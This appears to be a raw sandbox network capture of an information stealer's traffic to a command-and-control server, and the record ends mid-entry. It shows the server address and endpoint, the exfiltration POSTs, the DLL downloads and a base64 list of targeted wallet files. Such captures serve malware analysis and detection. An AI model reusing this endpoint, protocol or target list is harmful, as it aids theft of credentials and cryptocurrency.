Oct 3, 2024 18:38:16.627199888 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:16.686316013 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHI Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAFIJJJKEGIECAKKEHIContent-Disposition: form-data; name="file"------FCAFIJJJKEGIECAKKEHI--
Oct 3, 2024 18:38:17.561914921 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:18.524223089 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIJKEHCAKFCAKFHDAAA Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file"------EGIJKEHCAKFCAKFHDAAA--
Oct 3, 2024 18:38:18.632867098 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:18.633234024 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:18.633749008 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:16 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:19.347759962 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:18 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:19.855218887 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 18:38:20.085048914 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:19 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 3, 2024 18:38:20.986705065 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 18:38:21.210495949 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:21 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 3, 2024 18:38:21.661339998 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 18:38:21.884911060 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:21 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 3, 2024 18:38:22.284415007 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 18:38:22.505367994 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:22 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 3, 2024 18:38:24.067641020 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 18:38:24.291719913 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:24 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 3, 2024 18:38:24.632379055 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 3, 2024 18:38:24.857841015 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:24 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 3, 2024 18:38:25.440987110 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECG Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 3, 2024 18:38:26.163193941 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:25 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:26.236006021 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBF Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 2d 2d 0d 0a Data Ascii: ------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------HCAAEBKEGHJKEBFHJDBFContent-Disposition: form-data; name="message"wallets------HCAAEBKEGHJKEBFHJDBF--
Oct 3, 2024 18:38:26.460221052 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:26 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 3, 2024 18:38:26.463699102 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="token"00f8bbdb86dd146e5d2a3df36bbee3672175debfff2f77a03142718efc053706c55b8b23------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="message"files------ECBAEBGHDAECBGDGCAKE--
Oct 3, 2024 18:38:26.692646980 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 16:38:26 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 3, 2024 18:38:26.710481882 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAAEHDBFIDAFIDHJEBFB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 30 66 38 62 62 64 62 38 36 64 64 31 34 36 65 35 64 32 61 33 64 66 33 36 62 62 65 65 33 36 37 32 31 37 35 64 65 62 66 66 66 32 66 37 37 61 30 33 31 34 32 37 31 38 65 66 63 30 35 33 37 30 36 63 35 35 62 38 62 32 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 45 48 44 42 46 49 44 41 46 49 44 48 4a 45 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BAAEHDBFIDAFIDHJEBFBContent-Disposition: form-data; 